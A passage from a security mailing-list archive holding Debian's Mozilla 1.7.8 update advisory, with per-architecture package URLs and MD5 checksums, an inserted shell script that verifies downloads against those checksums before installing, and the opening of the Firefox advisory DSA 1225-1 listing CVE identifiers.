    http://security.debian.org/pool/updates/main/m/mozilla/mozilla-calendar_1.7.8-1sarge8_amd64.deb
      Size/MD5 checksum: 403272 6f5cba2fcd9f28e58e1a46ce9fe2034d
    http://security.debian.org/pool/updates/main/m/mozilla/mozilla-chatzilla_1.7.8-1sarge8_amd64.deb
      Size/MD5 checksum: 158328 ffd9e0136af049212c7668080b1590ba
    http://security.debian.org/pool/updates/main/m/mozilla/mozilla-dev_1.7.8-1sarge8_amd64.deb
      Size/MD5 checksum: 3352912 accc3e9736aa0758d131cdf459e2be49
    http://security.debian.org/pool/updates/main/m/mozilla/mozilla-dom-inspector_1.7.8-1sarge8_amd64.deb
      Size/MD5 checksum: 121194 cbf6ac02a99d7fb7a64cc29b07433c82
    http://security.debian.org/pool/updates/main/m/mozilla/mozilla-js-debugger_1.7.8-1sarge8_amd64.deb
      Size/MD5 checksum: 204156 ed48ca294a99e3e18eed491119c0d5ea
    http://security.debian.org/pool/updates/main/m/mozilla/mozilla-mailnews_1.7.8-1sarge8_amd64.deb
      Size/MD5 checksum: 1936052 c051bd4fe32d5d0225f3eae41b01af61
    http://security.debian.org/pool/updates/main/m/mozilla/mozilla-psm_1.7.8-1sarge8_amd64.deb
      Size/MD5 checksum: 204454 e52b74e973244cdc91030148777b2607

  ARM architecture:

    http://security.debian.org/pool/updates/main/m/mozilla/libnspr-dev_1.7.8-1sarge8_arm.deb
      Size/MD5 checksum: 168078 056a33d7d2c0d1ddec9dc82bc10fa91b
    http://security.debian.org/pool/updates/main/m/mozilla/libnspr4_1.7.8-1sarge8_arm.deb
      Size/MD5 checksum: 126062 279c0b2b4672b68c99414f2864d48c8e
    http://security.debian.org/pool/updates/main/m/mozilla/libnss-dev_1.7.8-1sarge8_arm.deb
      Size/MD5 checksum: 184962 d3b634a995bcb30e328c4bc23db47742
    http://security.debian.org/pool/updates/main/m/mozilla/libnss3_1.7.8-1sarge8_arm.deb
      Size/MD5 checksum: 633928 2021be577fc4731afad9fb85f10b900e
    http://security.debian.org/pool/updates/main/m/mozilla/mozilla_1.7.8-1sarge8_arm.deb
      Size/MD5 checksum: 1036 a6a62863932baa16457b8957f191dc8c
    http://security.debian.org/pool/updates/main/m/mozilla/mozilla-browser_1.7.8-1sarge8_arm.deb
      Size/MD5 checksum: 9221058 38cf4492787382ca6f092f8b8996c29d
    http://security.debian.org/pool/updates/main/m/mozilla/mozilla-calendar_1.7.8-1sarge8_arm.deb
      Size/MD5 checksum: 403328 db6d998bf24a01bc40e8958c18b8354a
    http://security.debian.org/pool/updates/main/m/mozilla/mozilla-chatzilla_1.7.8-1sarge8_arm.deb
      Size/MD5 checksum: 158342 5851791133fe390520c0dc627cf0e5bb
    http://security.debian.org/pool/updates/main/m/mozilla/mozilla-dev_1.7.8-1sarge8_arm.deb
      Size/MD5 checksum: 3342584 471aee590010373272675eb6dc51bf9b
    http://security.debian.org/pool/updates/main/m/mozilla/mozilla-dom-inspector_1.7.8-1sarge8_arm.deb
      Size/MD5 checksum: 112668 3a2b8d1d473e4801a0e90f0e6e20d173
    http://security.debian.org/pool/updates/main/m/mozilla/mozilla-js-debugger_1.7.8-1sarge8_arm.deb
      Size/MD5 checksum: 204162 6679a330049947996fd1649ee9015238
    http://security.debian.org/pool/updates/main/m/mozilla/mozilla-mailnews_1.7.8-1sarge8_arm.deb
      Size/MD5 checksum: 1604480 9ce39476d103f3d42cb500853c5f24d8
    http://security.debian.org/pool/updates/main/m/mozilla/mozilla-psm_1.7.8-1sarge8_arm.deb
      Size/MD5 checksum: 169002 02c81d7993667ef81be7c602681e96f0

  HP Precision architecture:

    http://security.debian.org/pool/updates/main/m/mozilla/libnspr-dev_1.7.8-1sarge8_hppa.deb
      Size/MD5 checksum: 168076 906aae615cfccc867128dfe39ac510bc
    http://security.debian.org/pool/updates/main/m/mozilla/libnspr4_1.7.8-1sarge8_hppa.deb
      Size/MD5 checksum: 158584 e4d74474057887b6cb2852f4e4b01c74
    http://security.debian.org/pool/updates/main/m/mozilla/libnss-dev_1.7.8-1sarge8_hppa.deb
      Size/MD5 checksum: 184956 5551d423e4375da8fb4f9c16dd6a3f3b
    http://security.debian.org/pool/updates/main/m/mozilla/libnss3_1.7.8-1sarge8_hppa.deb
      Size/MD5 checksum: 756664 d2a92775acd425551d1804c23eae7bdf
    http://security.debian.org/pool/updates/main/m/mozilla/mozilla_1.7.8-1sarge8_hppa.deb
      Size/MD5 checksum: 1038 7e88d25552135eb7f79a2fd2c6bd2b22
    http://security.debian.org/pool/updates/main/m/mozilla/mozilla-browser_1.7.8-1sarge8_hppa.deb
      Size/MD5 checksum: 12177466 14304d3394a221c2aa7bc531af9b591b
    http://security.debian.org/pool/updates/main/m/mozilla/mozilla-calendar_1.7.8-1sarge8_hppa.deb
      Size/MD5 checksum: 403286 f98a9ce0ae8980625c282f80523f0bc7
    http://security.debian.org/pool/updates/main/m/mozilla/mozilla-chatzilla_1.7.8-1sarge8_hppa.deb
      Size/MD5 checksum: 158338 c384d2a4f962d0b9820a5ba28cd1218c
    http://security.debian.org/pool/updates/main/m/mozilla/mozilla-dev_1.7.8-1sarge8_hppa.deb
      Size/MD5 checksum: 3359316 77e7f6cfee145742ae2e13f24ec27def
    http://security.debian.org/pool/updates/main/m/mozilla/mozilla-dom-inspector_1.7.8-1sarge8_hppa.deb
      Size/MD5 checksum: 123522 69dbc3a82863990e7ca431b7f6a29b61
    http://security.debian.org/pool/updates/main/m/mozilla/mozilla-js-debugger_1.7.8-1sarge8_hppa.deb
      Size/MD5 checksum: 204160 34b097e3f1e4a08af78541d3a12271e7
    http://security.debian.org/pool/updates/main/m/mozilla/mozilla-mailnews_1.7.8-1sarge8_hppa.deb
      Size/MD5 checksum: 2135234 33d7b6fbf3a170104167b5403fc3f794
    http://security.debian.org/pool/updates/main/m/mozilla/mozilla-psm_1.7.8-1sarge8_hppa.deb
      Size/MD5 checksum: 216448 fb8e5b76a683c26e1c3ced60acbb23b2

  Intel IA-32 architecture:

    http://security.debian.org/pool/updates/main/m/mozilla/libnspr-dev_1.7.8-1sarge8_i386.deb
      Size/MD5 checksum: 168078 fead516428ff54afba8fb9ffeb6107b7
    http://security.debian.org/pool/updates/main/m/mozilla/libnspr4_1.7.8-1sarge8_i386.deb
      Size/MD5 checksum: 138378 89380d80fe8f7e985a9307a9a677bc3e
    http://security.debian.org/pool/updates/main/m/mozilla/libnss-dev_1.7.8-1sarge8_i386.deb
      Size/MD5 checksum: 184968 0abd8dfb25de28cb50c5e58648a0ff3a
    http://security.debian.org/pool/updates/main/m/mozilla/libnss3_1.7.8-1sarge8_i386.deb
      Size/MD5 checksum: 662194 a2f137e0d9c3c8a936a7ef1393de2955
    http://security.debian.org/pool/updates/main/m/mozilla/mozilla_1.7.8-1sarge8_i386.deb
      Size/MD5 checksum: 1036 fd2f5c0d987df8a32ab9818ff0a2d968
    http://security.debian.org/pool/updates/main/m/mozilla/mozilla-browser_1.7.8-1sarge8_i386.deb
      Size/MD5 checksum: 10315404 db2f25cbb471e5387de1aeef7e176f7e
    http://security.debian.org/pool/updates/main/m/mozilla/mozilla-calendar_1.7.8-1sarge8_i386.deb
      Size/MD5 checksum: 403286 b3bf4d34d9a51f3f1708b06c70901cf3
    http://security.debian.org/pool/updates/main/m/mozilla/mozilla-chatzilla_1.7.8-1sarge8_i386.deb
      Size/MD5 checksum: 158358 fde8eec72729840210de689b2a343a51
    http://security.debian.org/pool/updates/main/m/mozilla/mozilla-dev_1.7.8-1sarge8_i386.deb
      Size/MD5 checksum: 3348734 081bfa3f5e9b81894f5a147ec05298ab
    http://security.debian.org/pool/updates/main/m/mozilla/mozilla-dom-inspector_1.7.8-1sarge8_i386.deb
      Size/MD5 checksum: 116236 5bb8e35c9cf6bcf73572e1307d4e036f
    http://security.debian.org/pool/updates/main/m/mozilla/mozilla-js-debugger_1.7.8-1sarge8_i386.deb
      Size/MD5 checksum: 204172 bb709199707869539300ae4ace073983
    http://security.debian.org/pool/updates/main/m/mozilla/mozilla-mailnews_1.7.8-1sarge8_i386.deb
      Size/MD5 checksum: 1811294 790f8577dc06fc90034945919a949ac7
    http://security.debian.org/pool/updates/main/m/mozilla/mozilla-psm_1.7.8-1sarge8_i386.deb
      Size/MD5 checksum: 192634 592adc759e44972dacdc85ebe1296a63

  Intel IA-64 architecture:

    http://security.debian.org/pool/updates/main/m/mozilla/libnspr-dev_1.7.8-1sarge8_ia64.deb
      Size/MD5 checksum: 168060 3ee0a67cfc308f6d7b0f9343a63f02fb
    http://security.debian.org/pool/updates/main/m/mozilla/libnspr4_1.7.8-1sarge8_ia64.deb
      Size/MD5 checksum: 176012 62b50ac23c369004b18620238da294dd
    http://security.debian.org/pool/updates/main/m/mozilla/libnss-dev_1.7.8-1sarge8_ia64.deb
      Size/MD5 checksum: 184936 443ef5c72a5fd2b92028468433fdc2da
    http://security.debian.org/pool/updates/main/m/mozilla/libnss3_1.7.8-1sarge8_ia64.deb
      Size/MD5 checksum: 968864 f4e5406c1a7abe968b52cccfd4ba3041
    http://security.debian.org/pool/updates/main/m/mozilla/mozilla_1.7.8-1sarge8_ia64.deb
      Size/MD5 checksum: 1032 682087a412c08bbc251fe22e56a0dd6d
    http://security.debian.org/pool/updates/main/m/mozilla/mozilla-browser_1.7.8-1sarge8_ia64.deb
      Size/MD5 checksum: 12966514 05ed823dbd6c55fd456f03f63aefb7e3
    http://security.debian.org/pool/updates/main/m/mozilla/mozilla-calendar_1.7.8-1sarge8_ia64.deb
      Size/MD5 checksum: 403270 03b53aaf2cd12b98d1e3f6f8a8d7dbea
    http://security.debian.org/pool/updates/main/m/mozilla/mozilla-chatzilla_1.7.8-1sarge8_ia64.deb
      Size/MD5 checksum: 158318 ee4f77127d14a091d8730fbcb7cab219
    http://security.debian.org/pool/updates/main/m/mozilla/mozilla-dev_1.7.8-1sarge8_ia64.deb
      Size/MD5 checksum: 3378656 76bc26292ee2482e3b7f18b807357898
    http://security.debian.org/pool/updates/main/m/mozilla/mozilla-dom-inspector_1.7.8-1sarge8_ia64.deb
      Size/MD5 checksum: 125584 372e14fa5d4a23a4df7f4b393f66bc3a
    http://security.debian.org/pool/updates/main/m/mozilla/mozilla-js-debugger_1.7.8-1sarge8_ia64.deb
      Size/MD5 checksum: 204148 030a13e33c394393c22cbbe03a5fd7b7
    http://security.debian.org/pool/updates/main/m/mozilla/mozilla-mailnews_1.7.8-1sarge8_ia64.deb
      Size/MD5 checksum: 2302326 2045f4c0ded45041ede24f2fe8316f25
    http://security.debian.org/pool/updates/main/m/mozilla/mozilla-psm_1.7.8-1sarge8_ia64.deb
      Size/MD5 checksum: 242940 92b1755ece7f86361e2467ecbe8a0b98

  Motorola 680x0 architecture:

    http://security.debian.org/pool/updates/main/m/mozilla/libnspr-dev_1.7.8-1sarge8_m68k.deb
      Size/MD5 checksum: 168086 d72a577c1f74c1e64183625c6afbb356
    http://security.debian.org/pool/updates/main/m/mozilla/libnspr4_1.7.8-1sarge8_m68k.deb
      Size/MD5 checksum: 127678 38a811b392550848806b4ea82b3786d9
    http://security.debian.org/pool/updates/main/m/mozilla/libnss-dev_1.7.8-1sarge8_m68k.deb
      Size/MD5 checksum: 184978 37b8d8c26f1e913bcc0676351655fbd9
    http://security.debian.org/pool/updates/main/m/mozilla/libnss3_1.7.8-1sarge8_m68k.deb
      Size/MD5 checksum: 601900 70ae4f03be4fb2a05589149a565184f4
    http://security.debian.org/pool/updates/main/m/mozilla/mozilla_1.7.8-1sarge8_m68k.deb
      Size/MD5 checksum: 1044 843ae71e0612517ec6d037f0157bcc6a
    http://security.debian.org/pool/updates/main/m/mozilla/mozilla-browser_1.7.8-1sarge8_m68k.deb
      Size/MD5 checksum: 9716824 1976d754f162f52fada5c6ae709a63df
    http://security.debian.org/pool/updates/main/m/mozilla/mozilla-calendar_1.7.8-1sarge8_m68k.deb
      Size/MD5 checksum: 403350 9299ef454121636429cd58ce4648de74
    http://security.debian.org/pool/updates/main/m/mozilla/mozilla-chatzilla_1.7.8-1sarge8_m68k.deb
      Size/MD5 checksum: 158384 8f5d9c08ce9ee22a7a523ab12d0339a1
    http://security.debian.org/pool/updates/main/m/mozilla/mozilla-dev_1.7.8-1sarge8_m68k.deb
      Size/MD5 checksum: 3337078 7c2763fc5d1399ba0f6de5e60c487a9f
    http://security.debian.org/pool/updates/main/m/mozilla/mozilla-dom-inspector_1.7.8-1sarge8_m68k.deb
      Size/MD5 checksum: 114460 847321a189d09a37590931b7bdaa12b8
    http://security.debian.org/pool/updates/main/m/mozilla/mozilla-js-debugger_1.7.8-1sarge8_m68k.deb
      Size/MD5 checksum: 204188 0acd1202b74153c09e96dc03c82f858c
    http://security.debian.org/pool/updates/main/m/mozilla/mozilla-mailnews_1.7.8-1sarge8_m68k.deb
      Size/MD5 checksum: 1683182 6fce1b70bc59f24fcaf9204ed8045a0e
    http://security.debian.org/pool/updates/main/m/mozilla/mozilla-psm_1.7.8-1sarge8_m68k.deb
      Size/MD5 checksum: 175004 ba9f9d625b54cb3b8338f353eb591d63

  Big endian MIPS architecture:

    http://security.debian.org/pool/updates/main/m/mozilla/libnspr-dev_1.7.8-1sarge8_mips.deb
      Size/MD5 checksum: 168066 40951a292610d572fb32bc9a08e3d716
    http://security.debian.org/pool/updates/main/m/mozilla/libnspr4_1.7.8-1sarge8_mips.deb
      Size/MD5 checksum: 142540 467f786d8c69106d6bf52c4ff0f147df
    http://security.debian.org/pool/updates/main/m/mozilla/libnss-dev_1.7.8-1sarge8_mips.deb
      Size/MD5 checksum: 184948 90d54a6da32f70c55e562ba0908bb615
    http://security.debian.org/pool/updates/main/m/mozilla/libnss3_1.7.8-1sarge8_mips.deb
      Size/MD5 checksum: 727612 bef2fa46727d30564df686f3bec97b4c
    http://security.debian.org/pool/updates/main/m/mozilla/mozilla_1.7.8-1sarge8_mips.deb
      Size/MD5 checksum: 1036 3f24cf20cf983e887def6ab4e83d313f
    http://security.debian.org/pool/updates/main/m/mozilla/mozilla-browser_1.7.8-1sarge8_mips.deb
      Size/MD5 checksum: 10739450 81c0c801442b91873e351e6469cd626d
    http://security.debian.org/pool/updates/main/m/mozilla/mozilla-calendar_1.7.8-1sarge8_mips.deb
      Size/MD5 checksum: 403256 7dea9f93c79476d6c4a08e7da9749d71
    http://security.debian.org/pool/updates/main/m/mozilla/mozilla-chatzilla_1.7.8-1sarge8_mips.deb
      Size/MD5 checksum: 158328 6ff36aad6504f5156e2cdc4e4e6990fa
    http://security.debian.org/pool/updates/main/m/mozilla/mozilla-dev_1.7.8-1sarge8_mips.deb
      Size/MD5 checksum: 3358884 7dc0ffad84ddf4ff45ed019f856ddde8
    http://security.debian.org/pool/updates/main/m/mozilla/mozilla-dom-inspector_1.7.8-1sarge8_mips.deb
      Size/MD5 checksum: 117622 63931cee65d76f9c7810110fffd591b7
    http://security.debian.org/pool/updates/main/m/mozilla/mozilla-js-debugger_1.7.8-1sarge8_mips.deb
      Size/MD5 checksum: 204148 64b3b20a437d605742e300d41cdbf251
    http://security.debian.org/pool/updates/main/m/mozilla/mozilla-mailnews_1.7.8-1sarge8_mips.deb
      Size/MD5 checksum: 1795510 92e0f045d8bf37b1ea6d90e84480d40c
    http://security.debian.org/pool/updates/main/m/mozilla/mozilla-psm_1.7.8-1sarge8_mips.deb
      Size/MD5 checksum: 190118 debdc2467236eec1f5ca49bc8ddac2c9

  Little endian MIPS architecture:

    http://security.debian.org/pool/updates/main/m/mozilla/libnspr-dev_1.7.8-1sarge8_mipsel.deb
      Size/MD5 checksum: 168074 cf9f50671782c08500d3c2d29f93ef9e
    http://security.debian.org/pool/updates/main/m/mozilla/libnspr4_1.7.8-1sarge8_mipsel.deb
      Size/MD5 checksum: 142492 b7b2127fa138bd01dc1c7b4fb4dc1638
    http://security.debian.org/pool/updates/main/m/mozilla/libnss-dev_1.7.8-1sarge8_mipsel.deb
      Size/MD5 checksum: 184942 4a26b1d61ac0daf627f2e7cb8797db82
    http://security.debian.org/pool/updates/main/m/mozilla/libnss3_1.7.8-1sarge8_mipsel.deb
      Size/MD5 checksum: 717068 0b935bf6dca82a129f2c678b6069b928
    http://security.debian.org/pool/updates/main/m/mozilla/mozilla_1.7.8-1sarge8_mipsel.deb
      Size/MD5 checksum: 1040 69af0bb34af5f881b501bd829b4364bf
    http://security.debian.org/pool/updates/main/m/mozilla/mozilla-browser_1.7.8-1sarge8_mipsel.deb
      Size/MD5 checksum: 10620284 93085f80cc02f554bf3d7e1e0d39c176
    http://security.debian.org/pool/updates/main/m/mozilla/mozilla-calendar_1.7.8-1sarge8_mipsel.deb
      Size/MD5 checksum: 403274 526ced11500a8d0c08044786255199df
    http://security.debian.org/pool/updates/main/m/mozilla/mozilla-chatzilla_1.7.8-1sarge8_mipsel.deb
      Size/MD5 checksum: 158340 7b6d7ee717b0bf427bbb469b05908f38
    http://security.debian.org/pool/updates/main/m/mozilla/mozilla-dev_1.7.8-1sarge8_mipsel.deb
      Size/MD5 checksum: 3359422 a710eb88d086ddd2f41f1c0f9a1582c6
    http://security.debian.org/pool/updates/main/m/mozilla/mozilla-dom-inspector_1.7.8-1sarge8_mipsel.deb
      Size/MD5 checksum: 117206 6f80a50306eb573deaa8052ef7b953c4
    http://security.debian.org/pool/updates/main/m/mozilla/mozilla-js-debugger_1.7.8-1sarge8_mipsel.deb
      Size/MD5 checksum: 204160 182f59bc3a66185d5d99f4f4b892bf0d
    http://security.debian.org/pool/updates/main/m/mozilla/mozilla-mailnews_1.7.8-1sarge8_mipsel.deb
      Size/MD5 checksum: 1777592 0bef8a8191417e642e11a87b95cbff28
    http://security.debian.org/pool/updates/main/m/mozilla/mozilla-psm_1.7.8-1sarge8_mipsel.deb
      Size/MD5 checksum: 187610 15e1ba2286e45ea4de8bd10e1043b4ae

  PowerPC architecture:

    http://security.debian.org/pool/updates/main/m/mozilla/libnspr-dev_1.7.8-1sarge8_powerpc.deb
      Size/MD5 checksum: 168068 4afc44e689523284f6596c49a0c57c04
    http://security.debian.org/pool/updates/main/m/mozilla/libnspr4_1.7.8-1sarge8_powerpc.deb
      Size/MD5 checksum: 132968 c7f1bc15d01ace3a8544dd8ac09c4f5f
    http://security.debian.org/pool/updates/main/m/mozilla/libnss-dev_1.7.8-1sarge8_powerpc.deb
      Size/MD5 checksum: 184954 69dd645183560089b4f0b079b14ff7ba
    http://security.debian.org/pool/updates/main/m/mozilla/libnss3_1.7.8-1sarge8_powerpc.deb
      Size/MD5 checksum: 720814 b919244b4647539e92ac8496175e5ec9
    http://security.debian.org/pool/updates/main/m/mozilla/mozilla_1.7.8-1sarge8_powerpc.deb
      Size/MD5 checksum: 1030 c93abd84beb9d1b5df1f393dcb742e4d
    http://security.debian.org/pool/updates/main/m/mozilla/mozilla-browser_1.7.8-1sarge8_powerpc.deb
      Size/MD5 checksum: 9712666 01692a2bb19b64406bcdecdf43fd6921
    http://security.debian.org/pool/updates/main/m/mozilla/mozilla-calendar_1.7.8-1sarge8_powerpc.deb
      Size/MD5 checksum: 403274 c84c30bab18ab3337cf7c995f1bd235e
    http://security.debian.org/pool/updates/main/m/mozilla/mozilla-chatzilla_1.7.8-1sarge8_powerpc.deb
      Size/MD5 checksum: 158332 e356212dd93e1bd4762f0350461bc0d8
    http://security.debian.org/pool/updates/main/m/mozilla/mozilla-dev_1.7.8-1sarge8_powerpc.deb
      Size/MD5 checksum: 3341184 51eac899e26a44b28ca9304f7de58bad
    http://security.debian.org/pool/updates/main/m/mozilla/mozilla-dom-inspector_1.7.8-1sarge8_powerpc.deb
      Size/MD5 checksum: 114586 582bec3e96ed89fb2b66d127135c2d99
    http://security.debian.org/pool/updates/main/m/mozilla/mozilla-js-debugger_1.7.8-1sarge8_powerpc.deb
      Size/MD5 checksum: 204154 cfcef824bc6d730f8749e92626377512
    http://security.debian.org/pool/updates/main/m/mozilla/mozilla-mailnews_1.7.8-1sarge8_powerpc.deb
      Size/MD5 checksum: 1643132 05d2aae54574a7440b11e3d1683b4491
    http://security.debian.org/pool/updates/main/m/mozilla/mozilla-psm_1.7.8-1sarge8_powerpc.deb
      Size/MD5 checksum: 175800 b9c2d4010924375ae96697b5c85a2886

  IBM S/390 architecture:

    http://security.debian.org/pool/updates/main/m/mozilla/libnspr-dev_1.7.8-1sarge8_s390.deb
      Size/MD5 checksum: 168068 49233d2e9ce43df4702d355bbe0a1405
    http://security.debian.org/pool/updates/main/m/mozilla/libnspr4_1.7.8-1sarge8_s390.deb
      Size/MD5 checksum: 158304 a8cdc38cb9ac827b54c646b8b5c2b2e7
    http://security.debian.org/pool/updates/main/m/mozilla/libnss-dev_1.7.8-1sarge8_s390.deb
      Size/MD5 checksum: 184938 4f7852977d08f31cfad5e8c352946426
    http://security.debian.org/pool/updates/main/m/mozilla/libnss3_1.7.8-1sarge8_s390.deb
      Size/MD5 checksum: 801008 abfe303f9e48e5341c81a9622c0f9f1c
    http://security.debian.org/pool/updates/main/m/mozilla/mozilla_1.7.8-1sarge8_s390.deb
      Size/MD5 checksum: 1032 35f2fdd96e584c9afbda26d3395ef78f
    http://security.debian.org/pool/updates/main/m/mozilla/mozilla-browser_1.7.8-1sarge8_s390.deb
      Size/MD5 checksum: 11340612 0a8315780402713a6f25f3bb068b9593
    http://security.debian.org/pool/updates/main/m/mozilla/mozilla-calendar_1.7.8-1sarge8_s390.deb
      Size/MD5 checksum: 403268 f4d3465aae90c369a0f4b0000f9b76f9
    http://security.debian.org/pool/updates/main/m/mozilla/mozilla-chatzilla_1.7.8-1sarge8_s390.deb
      Size/MD5 checksum: 158330 01c26b88dbf2a25b4520e484a324267e
    http://security.debian.org/pool/updates/main/m/mozilla/mozilla-dev_1.7.8-1sarge8_s390.deb
      Size/MD5 checksum: 3353508 2d8ca556688100796c7b66b65f509246
    http://security.debian.org/pool/updates/main/m/mozilla/mozilla-dom-inspector_1.7.8-1sarge8_s390.deb
      Size/MD5 checksum: 121340 1c28f9aa34ab20b8c9b87b6a484f29c0
    http://security.debian.org/pool/updates/main/m/mozilla/mozilla-js-debugger_1.7.8-1sarge8_s390.deb
      Size/MD5 checksum: 204142 e2c4c8c3b721f3560390c86f8a8e4f42
    http://security.debian.org/pool/updates/main/m/mozilla/mozilla-mailnews_1.7.8-1sarge8_s390.deb
      Size/MD5 checksum: 1944770 525714424a1fa0131327ced0961987c9
    http://security.debian.org/pool/updates/main/m/mozilla/mozilla-psm_1.7.8-1sarge8_s390.deb
      Size/MD5 checksum: 213646 31a3c2bc95b020fa1a4104cdb24f51cf

  Sun Sparc architecture:

    http://security.debian.org/pool/updates/main/m/mozilla/libnspr-dev_1.7.8-1sarge8_sparc.deb
      Size/MD5 checksum: 168070 ec1b9711bc09abaf87a1e8caeac523a9
    http://security.debian.org/pool/updates/main/m/mozilla/libnspr4_1.7.8-1sarge8_sparc.deb
      Size/MD5 checksum: 130234 a57dbc4e7d4fb4a7269dce9063b848d9
    http://security.debian.org/pool/updates/main/m/mozilla/libnss-dev_1.7.8-1sarge8_sparc.deb
      Size/MD5 checksum: 184964 f6d4813d577feef2530f5993e4dc5464
    http://security.debian.org/pool/updates/main/m/mozilla/libnss3_1.7.8-1sarge8_sparc.deb
      Size/MD5 checksum: 674592 5634a5745abfd58cec63f3615b9a7e0e
    http://security.debian.org/pool/updates/main/m/mozilla/mozilla_1.7.8-1sarge8_sparc.deb
      Size/MD5 checksum: 1036 222687822a8e79b3407dd3edec552b19
    http://security.debian.org/pool/updates/main/m/mozilla/mozilla-browser_1.7.8-1sarge8_sparc.deb
      Size/MD5 checksum: 9385078 1e10244c49ded27051ea0eeef38508f5
    http://security.debian.org/pool/updates/main/m/mozilla/mozilla-calendar_1.7.8-1sarge8_sparc.deb
      Size/MD5 checksum: 403290 fe2140858be3ef7e5b732dc9d98f5f40
    http://security.debian.org/pool/updates/main/m/mozilla/mozilla-chatzilla_1.7.8-1sarge8_sparc.deb
      Size/MD5 checksum: 158338 5703ab5f69f23b9deccc705bf97bfe16
    http://security.debian.org/pool/updates/main/m/mozilla/mozilla-dev_1.7.8-1sarge8_sparc.deb
      Size/MD5 checksum: 3342206 18dd2adf74fc28147f85cc55d4bafc25
    http://security.debian.org/pool/updates/main/m/mozilla/mozilla-dom-inspector_1.7.8-1sarge8_sparc.deb
      Size/MD5 checksum: 112520 0d19cd564f1c80ce919f85da844fe535
    http://security.debian.org/pool/updates/main/m/mozilla/mozilla-js-debugger_1.7.8-1sarge8_sparc.deb
      Size/MD5 checksum: 204166 6caff56854b59671710aace6b683bcc2
    http://security.debian.org/pool/updates/main/m/mozilla/mozilla-mailnews_1.7.8-1sarge8_sparc.deb
      Size/MD5 checksum: 1583766 3366a381ab996886b6924e1d12ad0bc7
    http://security.debian.org/pool/updates/main/m/mozilla/mozilla-psm_1.7.8-1sarge8_sparc.deb
      Size/MD5 checksum: 168196 2fc28554dfb6e322e354ccbdff26fb50


  These files will probably be moved into the stable distribution on
  its next update.
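The upgrade instructions in this advisory (and the identical ones in DSA 1225-1 that follows) fetch a .deb with wget and hand it to dpkg -i. The Size/MD5 pair listed for every file is there so the download can be checked before it is installed. The POSIX sh script below is an added example, not part of the Debian advisory or of Debian's tooling: it does that check and refuses to install a file that does not match. It assumes GNU md5sum or BSD md5 is installed; the helper names verify_deb, file_md5, file_size, install_checked and demo are my own. The commented invocation reuses the i386 mozilla-psm size and MD5 from the list above; the self-check uses a constructed temporary file so it runs offline.

```shell
#!/bin/sh
# Added example, not part of the Debian advisory: check a downloaded .deb
# against the "Size/MD5 checksum: <size> <md5>" pair the advisory lists
# before running "dpkg -i". All helper names here are my own.

# Print the MD5 hex digest of a file, using GNU md5sum or BSD md5.
file_md5() {
    if command -v md5sum >/dev/null 2>&1; then
        md5sum "$1" | cut -d' ' -f1
    else
        md5 -q "$1"
    fi
}

# Print the size of a file in bytes (BSD wc pads with spaces).
file_size() {
    wc -c < "$1" | tr -d ' '
}

# verify_deb FILE EXPECTED_SIZE EXPECTED_MD5
# Succeeds only when both the byte count and the MD5 match the advisory.
verify_deb() {
    file=$1
    want_size=$2
    want_md5=$(printf '%s' "$3" | tr 'A-F' 'a-f')
    if [ ! -f "$file" ]; then
        echo "verify_deb: $file: no such file" >&2
        return 1
    fi
    have_size=$(file_size "$file")
    if [ "$have_size" != "$want_size" ]; then
        echo "verify_deb: $file: size $have_size, advisory says $want_size" >&2
        return 1
    fi
    have_md5=$(file_md5 "$file")
    if [ "$have_md5" != "$want_md5" ]; then
        echo "verify_deb: $file: MD5 $have_md5, advisory says $want_md5" >&2
        return 1
    fi
    return 0
}

# install_checked URL SIZE MD5: the advisory's wget + dpkg -i, with the
# check in between; a file that fails the check is deleted, not installed.
install_checked() {
    url=$1
    deb=$(basename "$url")
    wget -q -O "$deb" "$url" || return 1
    verify_deb "$deb" "$2" "$3" || { rm -f "$deb"; return 1; }
    dpkg -i "$deb"
}

# Offline self-check with a constructed file: the intact file verifies,
# and a copy with one byte appended does not. Returns 0 if both hold.
demo() {
    tmp=$(mktemp) || return 1
    printf 'constructed sample package bytes\n' > "$tmp"
    size=$(file_size "$tmp")
    sum=$(file_md5 "$tmp")
    ok=1
    verify_deb "$tmp" "$size" "$sum" 2>/dev/null || ok=0
    printf 'x' >> "$tmp"   # simulate a truncated or tampered download
    if verify_deb "$tmp" "$size" "$sum" 2>/dev/null; then ok=0; fi
    rm -f "$tmp"
    [ "$ok" = 1 ]
}

# Stand-alone run: report the self-check. A real install from the list
# above would be (values taken from the i386 mozilla-psm entry):
#   install_checked http://security.debian.org/pool/updates/main/m/mozilla/mozilla-psm_1.7.8-1sarge8_i386.deb 192634 592adc759e44972dacdc85ebe1296a63
if demo; then echo "verify_deb self-check passed"; else echo "verify_deb self-check FAILED" >&2; fi
```

The size check runs first because it is free and catches truncated downloads before any hashing. A matching MD5 shows the file is the one the advisory describes, but MD5 alone does not prove who published it: the hash is only as trustworthy as the advisory carrying it, so the PGP signature on the advisory is what ties these values to Debian and should be checked as well.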
- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce at lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.5 (GNU/Linux)

iD8DBQFFcu2fW5ql+IAeqTIRAgn6AJ4ouLaDYxzUO8yo41wOsjgdYakn7wCfamS1
o3nLd80vTavGY8LgjJxV6Ok=
=SFB8
-----END PGP SIGNATURE-----

From joey at infodrom.org Sun Dec 3 16:35:28 2006
From: joey at infodrom.org (Martin Schulze)
Date: Sun, 3 Dec 2006 17:35:28 +0100 (CET)
Subject: [Full-disclosure] [SECURITY] [DSA 1225-1] New Mozilla Firefox packages fix several vulnerabilities
Message-ID: <20061203163528.5A6ABFDE1@finlandia.home.infodrom.org>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 1225-1                    security at debian.org
http://www.debian.org/security/                              Martin Schulze
December 3rd, 2006                      http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package        : mozilla-firefox
Vulnerability  : several
Problem type   : remote
Debian-specific: no
CVE IDs        : CVE-2006-4310 CVE-2006-5462 CVE-2006-5463 CVE-2006-5464 CVE-2006-5748
CERT advisories: VU#335392 VU#390480 VU#495288 VU#714496
BugTraq IDs    : 19678 20957

Several security related problems have been discovered in Mozilla and
derived products such as Mozilla Firefox. The Common Vulnerabilities
and Exposures project identifies the following vulnerabilities:

CVE-2006-4310

    Tomas Kempinsky discovered that malformed FTP server responses
    could lead to denial of service.

CVE-2006-5462

    Ulrich Kühn discovered that the correction for a cryptographic flaw
